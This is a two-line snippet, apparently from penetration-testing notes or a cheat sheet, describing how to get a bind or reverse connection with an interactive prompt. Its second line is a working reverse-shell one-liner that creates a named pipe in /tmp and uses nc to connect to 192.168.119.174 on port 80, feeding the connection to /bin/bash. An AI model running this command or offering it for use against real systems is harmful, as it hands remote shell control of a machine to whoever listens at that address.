It can help gain a bind or reverse connection to spawn an (psuedo-)interactive prompt for code execution.
cd /tmp;rm -f x; mknod x p && nc 192.168.119.174 80 0<x | /bin/bash 1>x